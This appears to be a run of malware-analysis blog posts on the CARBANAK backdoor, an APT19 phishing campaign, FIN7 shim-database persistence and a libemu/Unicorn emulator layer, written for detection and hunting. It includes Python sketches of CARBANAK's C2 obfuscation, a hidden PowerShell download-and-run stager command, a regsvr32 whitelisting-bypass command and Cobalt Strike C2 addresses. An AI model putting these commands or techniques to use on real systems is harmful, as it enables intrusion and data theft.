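encoded = encode_payload(b"\xfb\xff\x00example", iv)
assert encoded.startswith(iv)
```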

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.
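The URI obfuscation can be sketched as follows. The counts of inserted slashes and parameters are assumptions (the text says only "a random number"), and the extension lists come from the paragraph above:

```python
import random
import string

SCRIPT_EXTS = ('php', 'bml', 'cgi')
FILE_EXTS = ('gif', 'jpg', 'png', 'htm', 'html', 'php')

def rand_token(n: int) -> str:
    return ''.join(random.choices(string.ascii_lowercase, k=n))

def build_uri(encoded: str) -> str:
    chars = list(encoded)
    # Insert a random number of '/' characters at random positions
    for _ in range(random.randint(1, 5)):          # count is an assumption
        chars.insert(random.randint(0, len(chars)), '/')
    path = '/' + ''.join(chars)
    if random.random() < 0.5:
        # Script extension with random parameters
        params = '&'.join('%s=%s' % (rand_token(3), rand_token(5))
                          for _ in range(random.randint(1, 3)))
        return '%s.%s?%s' % (path, random.choice(SCRIPT_EXTS), params)
    # File extension with no parameters
    return '%s.%s' % (path, random.choice(FILE_EXTS))

def recover_payload(uri: str) -> str:
    # Reverse the obfuscation: drop query, extension, and '/' separators
    path = uri.split('?', 1)[0]
    return path.rsplit('.', 1)[0].replace('/', '')
```
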

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.
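Pulling proxy settings out of a Firefox prefs.js file can be sketched as below. The `network.proxy.http` preference names are real Firefox preferences; the parsing is a simplification of whatever the backdoor actually does:

```python
import re

def firefox_http_proxy(prefs_js: str):
    """Extract the HTTP proxy host and port from Firefox prefs.js text
    (simplified sketch of the proxy discovery described above)."""
    host = re.search(r'user_pref\("network\.proxy\.http",\s*"([^"]+)"\);', prefs_js)
    port = re.search(r'user_pref\("network\.proxy\.http_port",\s*(\d+)\);', prefs_js)
    if host and port:
        return host.group(1), int(port.group(1))
    return None
```
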

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format
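The size rules just described can be sketched as follows. zlib stands in for the sample's unidentified compression algorithm, and the framing is simplified (real messages carry the headers shown in Figure 6, including a length field the receiver would use instead of the `original_len` parameter here):

```python
import zlib

COMPRESS_THRESHOLD = 150
CHUNK_SIZE = 4096

def frame_message(body: bytes):
    """Apply the protocol's size rules: small messages pass through,
    mid-sized messages are compressed, large ones are split into
    compressed chunks. zlib is a stand-in compressor."""
    if len(body) <= COMPRESS_THRESHOLD:
        return [body]
    if len(body) <= CHUNK_SIZE:
        return [zlib.compress(body)]
    return [zlib.compress(body[i:i + CHUNK_SIZE])
            for i in range(0, len(body), CHUNK_SIZE)]

def unframe_message(chunks, original_len: int) -> bytes:
    if original_len <= COMPRESS_THRESHOLD:
        return chunks[0]
    return b''.join(zlib.decompress(c) for c in chunks)
```
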

Version 1

In the earliest version of the binary protocol, the message bodies stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.
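The header encryption in this version can be sketched as a simple repeating-key XOR. That the five-byte key repeats across the 19-byte span is our assumption; either way, applying the operation twice restores the original bytes:

```python
def xor_header(header: bytes, key: bytes) -> bytes:
    """XOR the first 19 header bytes with a five-byte per-message key.
    We assume the key repeats across the span (an assumption); XOR is
    symmetric, so encrypting twice decrypts."""
    assert len(key) == 5
    out = bytearray(header)
    for i in range(min(19, len(out))):
        out[i] ^= key[i % 5]
    return bytes(out)
```
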

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. We have observed that some builds of this data-stealing backdoor use outdated versions of the protocol, which may suggest that multiple groups of operators are compiling their own builds independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, some of them quite close together. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 server and runs it directly in memory. In another case, one build was programmed to check for the existence of the Blizko domain in the trusted sites list for Internet Explorer while the other was not (Blizko is an online money transfer service). We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Campaign Code

Compile Date

[Table rows did not survive extraction]
Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64-bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date, when they will become active.


The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, which appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – whether they are all directly orchestrated by the same criminal group, or whether they were perpetrated by loosely affiliated actors sharing malware and techniques.


In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast and Southwest Asia, that were targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.


DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity remains active to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.


The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk, as discussed above; they are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have direct access to the source code and know how to modify it, or have a close relationship with the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

Privileges and Credentials: Phished at the Request of Counsel


In May and June 2017, FireEye observed a phishing campaign targeting at least seven global law and investment firms. We have associated this campaign with APT19, a group that we assess is composed of freelancers, with some degree of sponsorship by the Chinese government.

APT19 used three different techniques to attempt to compromise targets. In early May, the phishing lures leveraged RTF attachments that exploited the Microsoft Windows vulnerability described in CVE-2017-0199. Toward the end of May, APT19 switched to using macro-enabled Microsoft Excel (XLSM) documents. In the most recent versions, APT19 added an application whitelisting bypass to the XLSM documents. At least one observed phishing lure delivered a Cobalt Strike payload.

As of the writing of this blog post, FireEye had not observed post-exploitation activity by the threat actors, so we cannot assess the goal of the campaign. We have previously observed APT19 steal data from law and investment firms for competitive economic purposes.

The purpose of this blog post is to inform law firms and investment firms of this phishing campaign and provide technical indicators that their IT personnel can use for proactive hunting and detection.

The Emails

APT19 phishing emails from this campaign originated from sender email accounts from the "@cloudsend[.]net" domain and used a variety of subjects and attachment names. Refer to the Indicators of Compromise section for more details.

The Attachments

APT19 leveraged Rich Text Format (RTF) and macro-enabled Microsoft Excel (XLSM) files to deliver their initial exploits. The following sections describe the two methods in further detail.

RTF Attachments

Through the exploitation of the HTA handler vulnerability described in CVE-2017-0199, the observed RTF attachments download hxxp://tk-in-f156.2bunny[.]com/Agreement.doc. Unfortunately, this file was no longer hosted at tk-in-f156.2bunny[.]com and was unavailable for further analysis. Figure 1 is a screenshot of a packet capture showing one of the RTF files reaching out to hxxp://tk-in-f156.2bunny[.]com/Agreement.doc.

Figure 1: RTF PCAP

XLSM Attachments

The XLSM attachments contained multiple worksheets with content that reflected the attachment name. The attachments also contained an image that requested the user to “Enable Content”, which would enable macro support if it was disabled. Figure 2 provides a screenshot of one of the XLSM files (MD5:30f149479c02b741e897cdb9ecd22da7).

Figure 2: Enable macros

One of the malicious XLSM attachments that we observed contained a macro that:

  1. Determined the system architecture to select the correct path for PowerShell
  2. Launched a ZLIB compressed and Base64 encoded command with PowerShell. This is a typical technique used by Meterpreter stagers.
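The decode step from item 2 can be reproduced in Python. .NET's IO.Compression.DeflateStream (used by these Meterpreter-style stagers) emits a raw DEFLATE stream, so we inflate with wbits=-15:

```python
import base64
import zlib

def decode_stager(blob: str) -> str:
    """Reverse the macro's encoding: Base64 decode, then inflate the
    raw DEFLATE stream (wbits=-15 matches IO.Compression.DeflateStream)."""
    return zlib.decompress(base64.b64decode(blob), -15).decode()
```
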

Figure 3 depicts the macro embedded within the XLSM file (MD5: 38125a991efc6ab02f7134db0ebe21b6).

Figure 3: XLSM macro

Figure 4 contains the decoded output of the encoded text.

Figure 4: Decoded ZLIB + Base64 payload

The shellcode invokes PowerShell to issue an HTTP GET request for a random four-character URI on the root of autodiscover[.]2bunny[.]com. The requests contain minimal HTTP headers because the PowerShell command is executed with mostly default parameters. Figure 5 depicts an HTTP GET request generated by the payload.

Figure 5: GET Request with minimal HTTP headers

Converting the shellcode to ASCII and removing the non-printable characters provides a quick way to pull out network-based indicators (NBI) from the shellcode. Figure 6 shows the extracted NBIs.

Figure 6: Decoded shellcode
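The extraction technique described above amounts to a strings-style pass over the shellcode, which is easy to sketch:

```python
import re

def extract_strings(shellcode: bytes, min_len: int = 4):
    """Keep runs of printable ASCII, the same effect as converting the
    shellcode to ASCII and discarding non-printable characters."""
    pattern = rb'[\x20-\x7e]{%d,}' % min_len
    return [m.group().decode('ascii') for m in re.finditer(pattern, shellcode)]
```
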

FireEye also identified an alternate macro in some of the XLSM documents, displayed in Figure 7.

Figure 7: Alternate macro

This macro uses Casey Smith’s “Squiblydoo” Application Whitelisting bypass technique to run the command in Figure 8.

Figure 8: Application Whitelisting Bypass

The command in Figure 8 downloads and launches code within an SCT file. The SCT file in the payload (MD5: 1554d6fe12830ae57284b389a1132d65) contained the code shown in Figure 9.

Figure 9: SCT contents

Figure 10 provides the decoded script. Notice the “$DoIt” string, which is usually indicative of a Cobalt Strike payload.

Figure 10: Decoded SCT contents

A quick conversion of the contents of the variable “$var_code” from Base64 to ASCII shows some familiar network indicators, shown in Figure 11.

Figure 11: $var_code to ASCII

Second Stage Payload

Once the XLSM launches its PowerShell command, it downloads a typical Cobalt Strike BEACON payload, configured with the following parameters:

  • Process Inject Targets:
    • %windir%\syswow64\rundll32.exe
    • %windir%\sysnative\rundll32.exe
  • c2_user_agents
    • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • Named Pipes
    • \\%s\pipe\msagent_%x
  • beacon_interval
    • 60
  • C2
    • autodiscover.2bunny[.]com/submit.php
    • autodiscover.2bunny[.]com/IE9CompatViewList.xml
    • sfo02s01-in-f2.cloudsend[.]net/submit.php
    • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • C2 Port
    • TCP/80

Figure 12 depicts an example of a BEACON C2 attempt from this payload.

Figure 12: Cobalt Strike BEACON C2

FireEye Product Detections

The following FireEye products currently detect and block the methods described above. Table 1 lists the current detection and blocking capabilities by product.

Detection Name

[Table contents largely lost in extraction; recovered detection names: XLSM Macro launch, Malware Object, BEACON written to disk, BEACON Callback]
Table 1: Detection review

*Appliances must be configured for block mode.


FireEye recommends organizations perform the following steps to mitigate the risk of this campaign:

  1. Microsoft Office users should apply the patch from Microsoft as soon as possible, if they have not already installed it.
  2. Search historic and future emails that match the included indicators of compromise.
  3. Review web proxy logs for connections to the included network based indicators of compromise.
  4. Block connections to the included fully qualified domain names.
  5. Review endpoints for the included host based indicators of compromise.

Indicators of Compromise

The following section provides the IOCs for the variants of the phishing emails and malicious payloads that FireEye has observed during this campaign.

Email Senders
  • PressReader <infodept@cloudsend[.]net>
  • Angela Suh <angela.suh@cloudsend[.]net>
  • Ashley Safronoff <ashley.safronoff@cloudsend[.]net>
  • Lindsey Hersh <lindsey.hersh@cloudsend[.]net>
  • Sarah Roberto sarah.roberto@cloudsend[.]net
  • noreply@cloudsend[.]net
Email Subject Lines
  • Macron Denies Authenticity Of Leak, French Prosecutors Open Probe
  • Macron Document Leaker Releases New Images, Promises More Information
  • Are Emmanuel Macron's Tax Evasion Documents Real?
  • Time Allocation
  • Vacancy Report
  • china paper table and graph
  • results with zeros – some ready not all finished
  • Macron Leaks contain secret plans for the islamisation of France and Europe
Attachment Names
  • Macron_Authenticity.doc.rtf
  • Macron_Information.doc.rtf
  • US and EU Trade with China and China CA.xlsm
  • Tables 4 5 7 Appendix with zeros.xlsm
  • Project Codes - 05.30.17.xlsm
  • Weekly Vacancy Status Report 5-30-15.xlsm
  • Macron_Tax_Evasion.doc.rtf
  • Macron_secret_plans.doc.rtf
Network Based Indicators (NBI)
  • lyncdiscover.2bunny[.]com
  • autodiscover.2bunny[.]com
  • lyncdiscover.2bunny[.]com:443/Autodiscover/AutodiscoverService/
  • lyncdiscover.2bunny[.]com/Autodiscover
  • autodiscover.2bunny[.]com/K5om
  • sfo02s01-in-f2.cloudsend[.]net/submit.php
  • sfo02s01-in-f2.cloudsend[.]net/IE9CompatViewList.xml
  • tk-in-f156.2bunny[.]com
  • tk-in-f156.2bunny[.]com/Agreement.doc
  • 104.236.77[.]169
  • 138.68.45[.]9
  • 162.243.143[.]145
  • Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; FunWebProducts; IE0006_ver1;EN_GB)
  • tf-in-f167.2bunny[.]com:443 (*Only seen in VT not ITW)
Host Based Indicators (HBI)

RTF MD5 hash values

  • 0bef39d0e10b1edfe77617f494d733a8
  • 0e6da59f10e1c4685bb5b35a30fc8fb6
  • cebd0e9e05749665d893e78c452607e2

XLSM MD5 hash values

  • 38125a991efc6ab02f7134db0ebe21b6
  • 3a1dca21bfe72368f2dd46eb4d9b48c4
  • 30f149479c02b741e897cdb9ecd22da7

BEACON and Meterpreter payload MD5 hash values

  • bae0b39197a1ac9e24bdf9a9483b18ea
  • 1151619d06a461456b310096db6bc548

Process arguments, named pipes, and file paths

  • powershell.exe -NoP -NonI -W Hidden -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String("<base64 blob>")
  • regsvr32.exe /s /n /u /i:hxxps:// scrobj.dll
  • \\<ip>\pipe\msagent_<4 digits>
  • C:\Documents and Settings\<user>\Local Settings\Temp\K5om.dll (4 character DLL based on URI of original GET request)
Yara Rules

       rule apt19_macro_chrw_obfuscation  // rule name not preserved in the source; placeholder
       {
           meta:
               author = "@TekDefense"
               description = "This rule is designed to identify macros with the specific encoding used in the sample 30f149479c02b741e897cdb9ecd22da7."
           strings:
               $ob1 = "ChrW(114) & ChrW(101) & ChrW(103) & ChrW(115) & ChrW(118) & ChrW(114) & ChrW(51) & ChrW(50) & ChrW(46) & ChrW(101)" ascii wide
               $ob2 = "ChrW(120) & ChrW(101) & ChrW(32) & ChrW(47) & ChrW(115) & ChrW(32) & ChrW(47) & ChrW(110) & ChrW(32) & ChrW(47)" ascii wide
               $ob3 = "ChrW(117) & ChrW(32) & ChrW(47) & ChrW(105) & ChrW(58) & ChrW(104) & ChrW(116) & ChrW(116) & ChrW(112) & ChrW(115)" ascii wide
               $ob4 = "ChrW(58) & ChrW(47) & ChrW(47) & ChrW(108) & ChrW(121) & ChrW(110) & ChrW(99) & ChrW(100) & ChrW(105) & ChrW(115)" ascii wide
               $ob5 = "ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(46) & ChrW(50) & ChrW(98) & ChrW(117) & ChrW(110)" ascii wide
               $ob6 = "ChrW(110) & ChrW(121) & ChrW(46) & ChrW(99) & ChrW(111) & ChrW(109) & ChrW(47) & ChrW(65) & ChrW(117) & ChrW(116)" ascii wide
               $ob7 = "ChrW(111) & ChrW(100) & ChrW(105) & ChrW(115) & ChrW(99) & ChrW(111) & ChrW(118) & ChrW(101) & ChrW(114) & ChrW(32)" ascii wide
               $ob8 = "ChrW(115) & ChrW(99) & ChrW(114) & ChrW(111) & ChrW(98) & ChrW(106) & ChrW(46) & ChrW(100) & ChrW(108) & ChrW(108)" ascii wide
               $obreg1 = /(\w{5}\s&\s){7}\w{5}/
               $obreg2 = /(Chrw\(\d{1,3}\)\s&\s){7}/
               // wscript
               $wsobj1 = "Set Obj = CreateObject(\"WScript.Shell\")" ascii wide
               $wsobj2 = "Obj.Run " ascii wide
           condition:
               (uint16(0) != 0x5A4D) and
               (
                   (all of ($wsobj*) and 3 of ($ob*)) or
                   (all of ($wsobj*) and all of ($obreg*))
               )
       }

       rule apt19_macro_powershell_stager  // rule name not preserved in the source; placeholder
       {
           meta:
               author = "@TekDefense"
               description = "This rule was written to hit on specific variables and powershell command fragments as seen in the macro found in the XLSX file 3a1dca21bfe72368f2dd46eb4d9b48c4."
           strings:
               // Setting the environment
               $env1 = "Arch = Environ(\"PROCESSOR_ARCHITECTURE\")" ascii wide
               $env2 = "windir = Environ(\"windir\")" ascii wide
               $env3 = "windir + \"\\syswow64\\windowspowershell\\v1.0\\powershell.exe\"" ascii wide
               // powershell command fragments
               $ps1 = "-NoP" ascii wide
               $ps2 = "-NonI" ascii wide
               $ps3 = "-W Hidden" ascii wide
               $ps4 = "-Command" ascii wide
               $ps5 = "New-Object IO.StreamReader" ascii wide
               $ps6 = "IO.Compression.DeflateStream" ascii wide
               $ps7 = "IO.MemoryStream" ascii wide
               $ps8 = ",$([Convert]::FromBase64String" ascii wide
               $ps9 = "ReadToEnd();" ascii wide
               $psregex1 = /\W\w+\s+\s\".+\"/
           condition:
               (uint16(0) != 0x5A4D) and
               (
                   (all of ($env*) and 6 of ($ps*)) or
                   (all of ($env*) and 4 of ($ps*) and all of ($psregex*))
               )
       }


        rule apt19_rtf_2bunny  // rule name not preserved in the source; placeholder
        {
            meta:
                description = "Rtf Phishing Campaign leveraging the CVE 2017-0199 exploit, to point to the domain 2bunnyDOTcom"
            strings:
                $header = "{\\rt"

                $lnkinfo = "4c0069006e006b0049006e0066006f"

                $encoded1 = "4f4c45324c696e6b"
                $encoded2 = "52006f006f007400200045006e007400720079"
                $encoded3 = "4f0062006a0049006e0066006f"
                $encoded4 = "4f006c0065"

                $http1 = "68{"
                $http2 = "74{"
                $http3 = "07{"

                $domain1 = "32{\\"
                $domain2 = "62{\\"
                $domain3 = "75{\\"
                $domain4 = "6e{\\"
                $domain5 = "79{\\"
                $domain6 = "2e{\\"
                $domain7 = "63{\\"
                $domain8 = "6f{\\"
                $domain9 = "6d{\\"

                $datastore = "\\*\\datastore"
            condition:
                $header at 0 and all of them
        }


Joshua Kim, Nick Carr, Gerry Stellatos, Charles Carmakal, TJ Dahms, Nick Richard, Barry Vengerik, Justin Prosco, Christopher Glyer

To SDB, Or Not To SDB: FIN7 Leveraging Shim Databases for Persistence

In 2017, Mandiant responded to multiple incidents we attribute to FIN7, a financially motivated threat group associated with malicious operations dating back to 2015. Throughout the various environments, FIN7 leveraged the CARBANAK backdoor, which this group has used in previous operations.

A unique aspect of the incidents was how the group installed the CARBANAK backdoor for persistent access. Mandiant identified that the group leveraged an application shim database to achieve persistence on systems in multiple environments. The shim injected a malicious in-memory patch into the Service Control Manager (“services.exe”) process, and then spawned a CARBANAK backdoor process.

Mandiant identified that FIN7 also used this technique to install a payment card harvesting utility for persistent access. This was a departure from FIN7’s previous approach of installing a malicious Windows service for process injection and persistent access.

Application Compatibility Shims Background

According to Microsoft, an application compatibility shim is a small library that transparently intercepts an API (via hooking), changes the parameters passed, handles the operation itself, or redirects the operation elsewhere, such as additional code stored on a system. Today, shims are mainly used for compatibility purposes for legacy applications. While shims serve a legitimate purpose, they can also be used in a malicious manner. Mandiant consultants previously discussed shim databases at both BruCon and BlackHat.
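The intercept/modify/forward pattern that shims implement can be illustrated with a small Python analogue. This is not the Windows shim engine itself, just the same idea applied to an ordinary function attribute:

```python
import functools
import types

def shim(module, name, pre=None):
    """Transparently intercept an API call: optionally rewrite the
    parameters, then forward to the original implementation. A Python
    analogue of the intercept/modify/redirect behavior described above,
    not the Windows shim machinery."""
    original = getattr(module, name)

    @functools.wraps(original)
    def wrapper(*args, **kwargs):
        if pre is not None:
            args, kwargs = pre(args, kwargs)   # change the parameters passed
        return original(*args, **kwargs)       # hand off to the real API

    setattr(module, name, wrapper)
    return original                            # returned so callers can restore it
```

For example, shimming a toy module's `add` so its first argument is doubled leaves callers unaware that anything sits between them and the original function.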

Shim Database Registration

There are multiple ways to register a shim database on a system. One technique is to use the built-in “sdbinst.exe” command line tool. Figure 1 displays the two registry keys created when a shim is registered with the “sdbinst.exe” utility.

Figure 1: Shim database registry keys

Once a shim database has been registered on a system, the shim database file (“.sdb” file extension) will be copied to the “C:\Windows\AppPatch\Custom” directory for 32-bit shims or “C:\Windows\AppPatch\Custom\Custom64” directory for 64-bit shims.

Malicious Shim Database Installation

To install and register the malicious shim database on a system, FIN7 used a custom Base64 encoded PowerShell script, which ran the “sdbinst.exe” utility to register a custom shim database file containing a patch onto a system. Figure 2 provides a decoded excerpt from a recovered FIN7 PowerShell script showing the parameters for this command.

Figure 2: Excerpt from a FIN7 PowerShell script to install a custom shim

FIN7 used various naming conventions for the shim database files that were installed and registered on systems with the “sdbinst.exe” utility. A common observance was the creation of a shim database file with a “.tmp” file extension (Figure 3).

Figure 3: Malicious shim database example

Upon registering the custom shim database on a system, a file named with a random GUID and an “.sdb” extension was written to the 64-bit shim database default directory, as shown in Figure 4. The registered shim database file had the same MD5 hash as the file that was initially created in the “C:\Windows\Temp” directory.

Figure 4: Shim database after registration

In addition, specific registry keys were created that correlated to the shim database registration.  Figure 5 shows the keys and values related to this shim installation.

Figure 5: Shim database registry keys

The database description used for the shim database registration, “Microsoft KB2832077”, was interesting because this KB number was not a published Microsoft Knowledge Base patch. This description (shown in Figure 6) appeared in the listing of installed programs within the Windows Control Panel on the compromised system.

Figure 6: Shim database as an installed application

Malicious Shim Database Details

During the investigations, Mandiant observed that FIN7 used a custom shim database to patch both the 32-bit and 64-bit versions of “services.exe” with their CARBANAK payload. This occurred when the “services.exe” process executed at startup. The shim database file contained shellcode for a first stage loader that obtained an additional shellcode payload stored in a registry key. The second stage shellcode launched the CARBANAK DLL (stored in a registry key), which spawned an instance of Service Host (“svchost.exe”) and injected itself into that process.  

Figure 7 shows a parsed shim database file that was leveraged by FIN7.

Figure 7: Parsed shim database file

For the first stage loader, the patch overwrote the “ScRegisterTCPEndpoint” function at relative virtual address (RVA) “0x0001407c” within the services.exe process with the malicious shellcode from the shim database file. 

The new “ScRegisterTCPEndpoint” function (shellcode) contained a reference to the path of “\REGISTRY\MACHINE\SOFTWARE\Microsoft\DRM”, which is a registry location where additional malicious shellcode and the CARBANAK DLL payload was stored on the system.

Figure 8 provides an excerpt of the parsed patch structure within the recovered shim database file.

Figure 8: Parsed patch structure from the shim database file

The shellcode stored within the registry path “HKLM\SOFTWARE\Microsoft\DRM” used the API function “RtlDecompressBuffer” to decompress the payload. It then slept for four minutes before calling the CARBANAK DLL payload's entry point on the system. Once loaded in memory, it created a new process named “svchost.exe” that contained the CARBANAK DLL. 

Bringing it Together

Figure 9 provides a high-level overview of a shim database being leveraged as a persistent mechanism for utilizing an in-memory patch, injecting shellcode into the 64-bit version of “services.exe”.

Figure 9: Shim database code injection process


Mandiant recommends the following to detect malicious application shimming in an environment:

  1. Monitor for new shim database files created in the default shim database directories of “C:\Windows\AppPatch\Custom” and “C:\Windows\AppPatch\Custom\Custom64”
  2. Monitor for registry key creation and/or modification events for the keys of “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Custom” and “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\InstalledSDB”
  3. Monitor process execution events and command line arguments for malicious use of the “sdbinst.exe” utility 
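Recommendation 1 can be sketched as a simple directory sweep. The paths are the default shim database directories named above; the registry checks from recommendation 2 are omitted here because they would require the Windows-only winreg module:

```python
import os

# Default shim database directories from the recommendations above
SHIM_DIRS = (r'C:\Windows\AppPatch\Custom',
             r'C:\Windows\AppPatch\Custom\Custom64')

def find_shim_databases(dirs=SHIM_DIRS):
    """Return paths of .sdb files found in the given directories.
    A minimal sketch, not a complete monitoring solution."""
    hits = []
    for d in dirs:
        if not os.path.isdir(d):
            continue  # directory absent on this system
        for name in sorted(os.listdir(d)):
            if name.lower().endswith('.sdb'):
                hits.append(os.path.join(d, name))
    return hits
```
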

Writing a libemu/Unicorn Compatibility Layer

In this post we are going to take a quick look at what it takes to write a libemu compatibility layer for the Unicorn engine. In the course of this work, we will also import the libemu Win32 environment to run under Unicorn.

For a bit of background, libemu is a lightweight x86 emulator written in C by Paul Baecher and Markus Koetter. It was released in 2007 and includes a built-in Win32 environment that allows shellcodes to resolve API at runtime. The library also provides end users with a convenient way to receive callbacks when API functions are hit. The original project supported 5 Windows DLLs, 51 hooks, and 234 opcodes, all wrapped in a tight 1 MB package. Unfortunately, it is no longer being updated.

In late 2015, we saw the Unicorn engine project released by Nguyen Anh Quynh and Dang Hoang Vu. This project takes the processor emulators from QEMU and wraps them into an easy to use library. Unicorn, however, does not provide a Win32 layer.

As an experiment, we were curious to see what it would take to bring the libemu Win32 environment into Unicorn. This task actually turned out to be quite simple, since it was nicely self-contained. In the process of exploring this, it also made sense to write a basic shim layer to support the libemu API and translate its inner workings over to Unicorn.

Let's start with the common libemu API:

The API is actually very similar to Unicorn:

